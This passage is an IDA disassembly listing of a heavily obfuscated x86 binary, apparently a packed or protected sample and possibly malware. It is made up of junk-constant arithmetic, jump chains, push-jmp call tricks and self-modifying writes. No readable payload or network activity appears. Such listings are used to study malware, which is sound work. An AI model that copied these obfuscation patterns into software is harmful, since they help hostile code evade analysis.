; END OF FUNCTION CHUNK	FOR sub_44AA1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D36

loc_43DB76:				; CODE XREF: sub_458D36:loc_44886Cj
		add	edi, ebp
		add	edi, 1B5BB7Fh
		mov	[edi], eax
		push	offset loc_4568EA
		jmp	nullsub_350
; END OF FUNCTION CHUNK	FOR sub_458D36
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DB8B:				; CODE XREF: hvvrg7ie:0045B4C4j
		jmp	loc_439D06
; ---------------------------------------------------------------------------

loc_43DB90:				; CODE XREF: hvvrg7ie:0044E4DFj
		jmp	loc_43ED86
; ---------------------------------------------------------------------------
		jo	loc_45A8E0
		jmp	sub_454D52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456CD4

loc_43DBA0:				; CODE XREF: sub_456CD4-1680Fj
		jno	loc_4498FE
		adc	edx, eax
		and	esi, 9CCA6FD3h
		jmp	loc_43C212
; END OF FUNCTION CHUNK	FOR sub_456CD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43DBB3:				; CODE XREF: sub_43EB47:loc_44035Aj
		call	sub_458706
		push	0A12E0F55h
		pop	eax
		sub	eax, 9D44C69h
		or	eax, 0A53A8A16h
		sub	eax, 0C2B27FC9h
		xor	eax, 188D097Ah
		add	eax, ebp
		jmp	loc_4400CF
; END OF FUNCTION CHUNK	FOR sub_43EB47

; =============== S U B	R O U T	I N E =======================================



sub_43DBDD	proc near		; CODE XREF: sub_439717:loc_44F75Ap
					; hvvrg7ie:00453D4Dj
		xchg	ecx, [esp+0]
		pop	ecx
		push	eax
		push	offset sub_449112
		jmp	nullsub_413
sub_43DBDD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CB64

loc_43DBEC:				; CODE XREF: sub_44CB64:loc_43EC2Aj
		mov	eax, [ebp+var_4]
		mov	al, [eax]
		jo	loc_446250
		push	offset loc_456962
		jmp	loc_45A8DB
; END OF FUNCTION CHUNK	FOR sub_44CB64
; ---------------------------------------------------------------------------

loc_43DC01:				; CODE XREF: hvvrg7ie:loc_43CD92j
		or	esi, 0DAF4CBAAh
		sub	esi, 5CD27080h
		add	esi, 10EA0B73h
		add	esi, ebp
		add	esi, 50E9751Bh
		mov	[esi], eax
		pop	esi
		mov	eax, [ebp-4]
		jmp	loc_4499BA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43DC26:				; CODE XREF: sub_450AA8:loc_450AAEj
		jnz	loc_43BE60
		jmp	loc_4548BB
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_43DC31	proc near		; CODE XREF: hvvrg7ie:00440CE3j
					; sub_449425-4864p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044534A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A63C SIZE 00000018 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [esp-4+arg_0]
		push	edx
		push	eax
		push	0EC87298Dh
		jmp	loc_44534A
sub_43DC31	endp


; =============== S U B	R O U T	I N E =======================================



sub_43DC44	proc near		; DATA XREF: hvvrg7ie:loc_451EB9o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045AF97 SIZE 00000005 BYTES

		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		push	ebx
		push	offset sub_456F2D
		jmp	loc_45AF97
sub_43DC44	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_43DC55:				; CODE XREF: sub_453422-351Fj
		add	ecx, esi
; END OF FUNCTION CHUNK	FOR sub_453422
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43DC57:				; CODE XREF: sub_44BCAE-4270j
		shr	eax, 0Bh
		xchg	edi, ecx
		adc	esi, eax
		jmp	loc_4449C4
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------

loc_43DC63:				; CODE XREF: hvvrg7ie:00456A12j
		jnp	loc_456BC6
		push	esi
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_43DC6A:				; CODE XREF: sub_440AD9:loc_456A01j
		add	eax, 0F5CA3F92h
		xor	eax, 3A419665h
		add	eax, ebp
		add	eax, 31E10760h
		mov	dword ptr [eax], 6C43776Fh
		push	1752CEF8h
		jmp	loc_448D25
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------

loc_43DC8E:				; DATA XREF: sub_455ACA:loc_456D9Bo
		call	sub_453E08
		mov	edx, 0B70DD039h
		call	sub_446A16
		push	eax
		jmp	loc_44AA86
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F50

loc_43DCA4:				; CODE XREF: sub_457F50-5D43j
		jmp	loc_4553C6
; END OF FUNCTION CHUNK	FOR sub_457F50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439FEE

loc_43DCA9:				; CODE XREF: sub_439FEE+F584j
		jmp	loc_4591DE
; END OF FUNCTION CHUNK	FOR sub_439FEE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B1C6

loc_43DCAE:				; CODE XREF: sub_44B1C6-FD7Dj
		jmp	nullsub_531
; END OF FUNCTION CHUNK	FOR sub_44B1C6
; ---------------------------------------------------------------------------

loc_43DCB3:				; CODE XREF: hvvrg7ie:004395A2j
		shl	ebx, 1Ch
; START	OF FUNCTION CHUNK FOR sub_44E533

loc_43DCB6:				; CODE XREF: sub_44E533:loc_439592j
		sub	eax, 2D56BCCDh
		xor	eax, 2327C06Ah
		push	offset sub_449885
		jmp	loc_4564CD
; END OF FUNCTION CHUNK	FOR sub_44E533
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA4B

loc_43DCCC:				; CODE XREF: sub_44CA4B+15j
		not	ecx
		and	ebx, esi
		jmp	loc_4595BE
; END OF FUNCTION CHUNK	FOR sub_44CA4B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_43DCD6:				; CODE XREF: sub_448100-1C2Fj
		jmp	loc_43CCB0
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43DCDB:				; CODE XREF: sub_446D8D+1273Ej
		call	sub_43B8A5
		cmp	eax, 7DDEA331h
		jmp	loc_454EBD
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439190

loc_43DCEB:				; CODE XREF: sub_439190+D6Fj
		mov	byte ptr [eax],	0C3h
		jmp	loc_43F93F
; END OF FUNCTION CHUNK	FOR sub_439190
; ---------------------------------------------------------------------------
		call	nullsub_356
		jmp	ds:dword_41D0FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43DCFE:				; CODE XREF: sub_440C05-7923j
		jmp	loc_44E55E
; END OF FUNCTION CHUNK	FOR sub_440C05
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_356. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	[edi+5A0000BAh], dh
		mov	eax, [esp]
		jmp	loc_459839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43DD12:				; CODE XREF: sub_44BCAE-4268j
		rol	ebx, 0Ah
		shl	ecx, 12h

loc_43DD18:				; CODE XREF: sub_44BCAE:loc_44C101j
		push	5A430C96h
		pop	eax
		rol	eax, 19h
		jmp	loc_4571FD
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------

loc_43DD26:				; CODE XREF: hvvrg7ie:00451654j
		and	ecx, 0E9FA416Ch

; =============== S U B	R O U T	I N E =======================================



sub_43DD2C	proc near		; CODE XREF: sub_43E26C:loc_44ACC1p

; FUNCTION CHUNK AT 0043EBD0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004453D5 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D466 SIZE 00000004 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jz	loc_4453D5
		push	ebp

loc_43DD37:				; CODE XREF: hvvrg7ie:0043D7B1j
		mov	eax, [ebp-20h]
		call	sub_44D46F
		pop	ecx
		jmp	loc_43EBD0
sub_43DD2C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		cmp	eax, ebp
		jmp	loc_44B77D
; ---------------------------------------------------------------------------
		xor	eax, 0FE279748h
		push	edi
		push	87374Ch
		pop	edi
		and	edi, 0DAD81647h
		add	edi, 862D98A3h
		jmp	loc_44C24B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4450D8

loc_43DD6A:				; CODE XREF: sub_4450D8+319Bj
		xchg	ecx, [esp+0]
		jmp	sub_457C82
; END OF FUNCTION CHUNK	FOR sub_4450D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B29

loc_43DD72:				; CODE XREF: sub_444B29:loc_44344Dj
		mov	esp, ebp
		pop	ebp
		call	sub_444F71

loc_43DD7A:				; CODE XREF: hvvrg7ie:loc_44DB23j
		jnb	loc_44E279
; END OF FUNCTION CHUNK	FOR sub_444B29
; START	OF FUNCTION CHUNK FOR sub_43972A

loc_43DD80:				; CODE XREF: sub_43972A+Aj
		jmp	nullsub_36
; END OF FUNCTION CHUNK	FOR sub_43972A
; ---------------------------------------------------------------------------
		rol	esi, 15h
		add	edx, 9D417F5Eh
		and	esi, edx
		jmp	loc_44E273
; ---------------------------------------------------------------------------

loc_43DD95:				; CODE XREF: hvvrg7ie:0044E318j
		add	edi, 9C83814h
		add	eax, edi
		pop	edi
		xor	eax, 3CE7CA29h
		ror	eax, 1Dh
		push	edx
		call	sub_447BD1
; START	OF FUNCTION CHUNK FOR sub_43E98F

loc_43DDAD:				; CODE XREF: sub_43E98F+7j
		jmp	loc_441BB3
; END OF FUNCTION CHUNK	FOR sub_43E98F
; ---------------------------------------------------------------------------

loc_43DDB2:				; CODE XREF: hvvrg7ie:0043A131j
		xchg	eax, [esi]
		cmp	ebp, ecx
		jmp	loc_443790
; ---------------------------------------------------------------------------

loc_43DDBB:				; CODE XREF: hvvrg7ie:0044DD0Cj
		jnz	loc_44A914
		jmp	loc_43CBED
; ---------------------------------------------------------------------------
		sbb	edx, 0ABBA1B54h
		jmp	sub_44E141
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_43DDD1:				; CODE XREF: sub_45202B:loc_4401B0j
		add	eax, 848A2B4Dh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_446CF1
		jmp	loc_43B8C3
; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_43DDE6:				; CODE XREF: sub_446EC2-2570j
		jl	loc_440D27
		xor	edx, edi
		js	loc_444E53
		not	edx
		test	ebp, 0E53FFB2Bh
		jmp	loc_4480C9
; END OF FUNCTION CHUNK	FOR sub_446EC2

; =============== S U B	R O U T	I N E =======================================



sub_43DE01	proc near		; DATA XREF: sub_43AB99+1346Bo

; FUNCTION CHUNK AT 004451AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447DC6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00451FD2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458B37 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004592DD SIZE 00000005 BYTES

		mov	[ebp-8], eax
		push	esi
		call	sub_450E01

loc_43DE0A:				; CODE XREF: sub_452C40:loc_44791Ej
		push	0B19AB33Fh
		pop	ebx
		sub	ebx, 13347D88h
		add	ebx, 61DB9AA1h
		call	sub_450EE2

loc_43DE21:				; CODE XREF: sub_43A0C9+1B9BFj
		jmp	loc_451FD2
sub_43DE01	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_43DE26:				; CODE XREF: sub_446E8C+CDEEj
		jmp	loc_454DC0
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AAE4

loc_43DE2B:				; CODE XREF: sub_43AAE4:loc_43AAEBj
		jmp	loc_45817F
; END OF FUNCTION CHUNK	FOR sub_43AAE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43DE30:				; CODE XREF: sub_4413A5+F497j
		add	edi, 0EFD045DFh
		pushf
		cmp	edi, ecx
		jmp	loc_43B1C8
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_43DE3E:				; CODE XREF: sub_450F97:loc_448A6Dj
					; sub_4465E5+42FFj
		jp	locret_44402E

loc_43DE44:				; CODE XREF: sub_4465E5:loc_43F043j
		push	edx
		push	0B8E403Ch
		pop	edx
		and	edx, 0D77029ABh
		jmp	loc_43D65E
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------

loc_43DE56:				; CODE XREF: hvvrg7ie:00450C9Ej
		jz	loc_43E7EF
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_43DE5C:				; CODE XREF: sub_44616F+AB14j
		or	ecx, 1D128D4h
		xor	ecx, 0A789C004h

loc_43DE68:				; CODE XREF: sub_45A234:loc_45113Aj
		add	ecx, 0DBD090C9h
		jmp	loc_44E6D0
; END OF FUNCTION CHUNK	FOR sub_44616F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_396. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DE74:				; CODE XREF: hvvrg7ie:0043A1E0j
		jmp	loc_44E33D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4EF

loc_43DE79:				; CODE XREF: sub_43931C+54C8j
					; sub_44D4EF+8j
		rol	eax, 8
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]
		call	sub_43E7F3
		jmp	loc_45B5AA
; END OF FUNCTION CHUNK	FOR sub_44D4EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8FB

loc_43DE8C:				; CODE XREF: sub_44C8FB:loc_457FAEj
		jz	loc_44BB1F
		jmp	loc_44EDE2
; END OF FUNCTION CHUNK	FOR sub_44C8FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ABA3

loc_43DE97:				; CODE XREF: sub_44ABA3:loc_43D5DEj
		jns	loc_448556
		mov	[ebp+0], edi
		jmp	loc_4416F4
; END OF FUNCTION CHUNK	FOR sub_44ABA3
; ---------------------------------------------------------------------------

loc_43DEA5:				; CODE XREF: hvvrg7ie:004555D3j
		jg	loc_44A409
		mov	eax, 1A209956h
		jmp	loc_456610
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_43DEB5:				; CODE XREF: sub_450A7A:loc_43E6D6j
		jz	loc_455E2E
		ror	ebx, 3
		jmp	loc_454B11
; END OF FUNCTION CHUNK	FOR sub_450A7A

; =============== S U B	R O U T	I N E =======================================



sub_43DEC3	proc near		; DATA XREF: sub_4507AA+1o

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004397E9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043A303 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EDBD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044018D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044364F SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0045AF92 SIZE 00000005 BYTES

		jz	loc_44018D
		mov	eax, [esp+4+var_4]
		push	ebx
		mov	ebx, edx

loc_43DECF:				; CODE XREF: hvvrg7ie:loc_459AE3j
		jmp	loc_45AF92
sub_43DEC3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43DED4:				; CODE XREF: sub_43C811:loc_452368j
		sub	ecx, esi
		jmp	loc_4529B3
; END OF FUNCTION CHUNK	FOR sub_43C811
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_423. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_43DEDC:				; CODE XREF: sub_43B851+1977Dj
		jmp	loc_440B55
; END OF FUNCTION CHUNK	FOR sub_43B851
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EC3

loc_43DEE1:				; CODE XREF: sub_454EC3+11j
		jmp	loc_446EE6
; END OF FUNCTION CHUNK	FOR sub_454EC3
; ---------------------------------------------------------------------------

loc_43DEE6:				; CODE XREF: hvvrg7ie:0044ED1Ej
		jmp	sub_4500E7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_43DEEB:				; CODE XREF: sub_4544DD-CF29j
		jmp	sub_44AA5B
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_43DEF0:				; CODE XREF: sub_44C1F3-CADEj
		jmp	loc_43E0EF
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A234

loc_43DEF5:				; CODE XREF: sub_45A234-90E0j
		call	sub_439AE3
		push	esi
		mov	esi, edi
		xchg	esi, [esp+8+var_8]
		mov	edi, eax
		jmp	loc_443C43
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447D56

loc_43DF07:				; CODE XREF: sub_447D56:loc_446334j
		cmp	edi, ebx
		jmp	loc_44CDF5
; END OF FUNCTION CHUNK	FOR sub_447D56
; ---------------------------------------------------------------------------

loc_43DF0E:				; CODE XREF: hvvrg7ie:0044D1B5j
		and	edx, 0E1D5796Dh

loc_43DF14:				; CODE XREF: hvvrg7ie:loc_4452FEj
		mov	eax, offset off_4578D0
		mov	[ebp-4], eax
		mov	eax, offset dword_457918
		mov	[ebp-8], eax
; START	OF FUNCTION CHUNK FOR sub_440643

loc_43DF24:				; CODE XREF: sub_440643:loc_44F998j
		push	6AB8DF4Bh
		pop	eax
		xor	eax, 56C121B1h
		jmp	loc_448C86
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43DF35:				; CODE XREF: sub_4403B6+186FFj
		rol	esi, 2
		call	sub_44FFD8
; END OF FUNCTION CHUNK	FOR sub_4403B6
; START	OF FUNCTION CHUNK FOR sub_445FD4

loc_43DF3D:				; CODE XREF: sub_445FD4+Dj
					; sub_442F6B:loc_44FA9Ej
		jmp	loc_453E30
; END OF FUNCTION CHUNK	FOR sub_445FD4
; ---------------------------------------------------------------------------

loc_43DF42:				; CODE XREF: hvvrg7ie:0044A7E9j
		sub	al, 99h
		push	1A589380h
		pop	edx
		or	edx, 0EB86E578h
		jnz	loc_4530AB
; START	OF FUNCTION CHUNK FOR sub_449CC8

loc_43DF56:				; CODE XREF: sub_449CC8+8A7Dj
		jmp	loc_44F9D4
; END OF FUNCTION CHUNK	FOR sub_449CC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450FB5

loc_43DF5B:				; CODE XREF: sub_450FB5+12j
		jmp	nullsub_501
; END OF FUNCTION CHUNK	FOR sub_450FB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B648

loc_43DF60:				; CODE XREF: sub_43B648+Dj
		jmp	sub_450C5A
; END OF FUNCTION CHUNK	FOR sub_43B648
; ---------------------------------------------------------------------------
		pushf
		jmp	loc_4591B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43DF6B:				; CODE XREF: sub_44059F:loc_4527CDj
		jz	loc_441F88
		jmp	loc_43C65E
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------

loc_43DF76:				; CODE XREF: hvvrg7ie:004467B9j
		jge	loc_4554AD

loc_43DF7C:				; CODE XREF: hvvrg7ie:loc_44E495j
		lea	eax, [ebp-800h]
		push	edx
		mov	edx, eax
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_43DF85:				; CODE XREF: sub_43A839+FA53j
		xchg	edx, [esp+0]
		jmp	loc_44FAF1
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
		push	7C1A278Dh
		pop	eax
		add	eax, 746390E1h
		call	sub_44CB41
; START	OF FUNCTION CHUNK FOR sub_4453EC

loc_43DF9E:				; CODE XREF: sub_4453EC+Ej
		jmp	loc_44A13E
; END OF FUNCTION CHUNK	FOR sub_4453EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43DFA3:				; CODE XREF: sub_43D285+2D8Bj
		jnz	loc_44A8F7
		rol	ebp, 0Fh
		jmp	loc_44ED91
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_43DFB1:				; CODE XREF: hvvrg7ie:loc_43F8A6j
		call	sub_44612F
		or	eax, eax
		jnz	loc_44D961
		jmp	loc_43B6C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_43DFC3:				; CODE XREF: hvvrg7ie:loc_452989j
					; sub_43CD0B+1994Cj
		add	ebx, 9AE63862h
		push	0A253A064h

loc_43DFCE:				; CODE XREF: sub_43CD0B:loc_45664Ej
		add	ecx, 8B1414Eh
		xchg	ecx, [esp+0]
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454789

loc_43DFDC:				; CODE XREF: sub_454789:loc_4489E4j
		pop	ebx
		rol	ebx, 0Bh
		or	ebx, 26B9A80Bh
		rol	ebx, 0Fh
		or	ebx, 0ACE8798h
		jmp	loc_451907
; END OF FUNCTION CHUNK	FOR sub_454789
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_276. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43DFF5:				; CODE XREF: hvvrg7ie:loc_455F18j
		jmp	loc_44F843
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B3FF

loc_43DFFA:				; CODE XREF: sub_45B3FF:loc_44E2C8j
		mov	ecx, [ebp-1Ch]
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		jmp	loc_44DE9C
; END OF FUNCTION CHUNK	FOR sub_45B3FF
; ---------------------------------------------------------------------------
		cmp	ecx, 49AF1259h
		jmp	loc_43F280
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43E014:				; CODE XREF: sub_43F227:loc_4464B6j
		or	eax, eax
		jnz	loc_447D51
		jmp	loc_455D48
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_43E021:				; CODE XREF: hvvrg7ie:004458CBj
		jno	loc_454323

; =============== S U B	R O U T	I N E =======================================



sub_43E027	proc near		; CODE XREF: hvvrg7ie:0044709Fp

; FUNCTION CHUNK AT 0043AB94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A443 SIZE 0000001A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	2890C942h
		pop	edx
		or	edx, 8EF06610h
		jmp	loc_43AB94
sub_43E027	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450C5A

loc_43E03D:				; CODE XREF: sub_450C5A-D0F3j
		mov	edx, eax
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_450E66
; ---------------------------------------------------------------------------

loc_43E047:				; CODE XREF: sub_450C5Aj
		mov	edx, ds:dword_4589F8
		push	offset sub_4465A6

loc_43E052:				; CODE XREF: hvvrg7ie:loc_448BAAj
		jmp	loc_44D7D9
; END OF FUNCTION CHUNK	FOR sub_450C5A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43E057:				; CODE XREF: sub_43F227+11993j
		jz	loc_4436CB
		jmp	loc_44307E
; END OF FUNCTION CHUNK	FOR sub_43F227
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_43E063	proc near		; CODE XREF: hvvrg7ie:00439BEFj
					; sub_452585:loc_455D43p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 004390F8 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00439799 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043E114 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F5F8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043F9F9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044108A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044409B SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00446C28 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448F5E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044A870 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B4F5 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0044B7BC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D330 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D99F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044E023 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E957 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FCE9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004524A4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454C54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455F9E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456688 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456774 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456838 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00459913 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B5B5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B82E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B90A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B990 SIZE 00000009 BYTES

		xchg	edi, [esp-4+arg_0]
		pop	edi
		mov	[edx-18h], eax
		inc	dword ptr [ebp-4]

loc_43E06D:				; CODE XREF: sub_44DA89+Aj
		mov	eax, [ebp+8]
		mov	eax, [eax-18h]
		jmp	loc_44B4F5
sub_43E063	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_43E078:				; CODE XREF: sub_446D8D-DA0Aj
		add	edi, esi
		sub	edi, ebx
		jmp	loc_455744
; ---------------------------------------------------------------------------

loc_43E081:				; CODE XREF: sub_446D8D-74AAj
					; hvvrg7ie:loc_44E729j
		sub	al, 99h
		mov	edx, [ebp-4]

loc_43E086:				; CODE XREF: hvvrg7ie:004403A9j
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_45090E
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------
		mov	eax, 0EFFDE014h
		call	sub_44059F
		push	ebx
		push	8189BB0Eh
		jmp	loc_44AA97
; ---------------------------------------------------------------------------

loc_43E0A4:				; CODE XREF: hvvrg7ie:loc_4494A4j
					; hvvrg7ie:004494C9j
		xor	ecx, 37E795A1h
		xchg	ecx, [esp]
		lea	eax, [ebp-64h]
		push	eax
		push	ecx
		push	6C0919C3h
		jmp	loc_43FD10
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4449AD

loc_43E0BC:				; CODE XREF: sub_440643:loc_43BFA9j
					; sub_4449AD+654Bj
		push	0B9C3DA92h
		pop	eax
		rol	eax, 0Fh
		push	offset loc_441CF5
		jmp	loc_449334
; END OF FUNCTION CHUNK	FOR sub_4449AD
; ---------------------------------------------------------------------------
		jmp	ds:dword_41D108
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C46

loc_43E0D5:				; CODE XREF: sub_448C46-F971j
		jmp	nullsub_73
; END OF FUNCTION CHUNK	FOR sub_448C46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD	"+" TO EXPAND]
		dd offset loc_43FF10
; ---------------------------------------------------------------------------
		jmp	loc_4578C9
; ---------------------------------------------------------------------------
		add	ebx, 50BE5C2Ah
		jmp	loc_446364
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1F3

loc_43E0EF:				; CODE XREF: sub_44C1F3:loc_43DEF0j
		cmp	eax, 0C906BBEFh
		jmp	loc_43B5F1
; END OF FUNCTION CHUNK	FOR sub_44C1F3
; ---------------------------------------------------------------------------

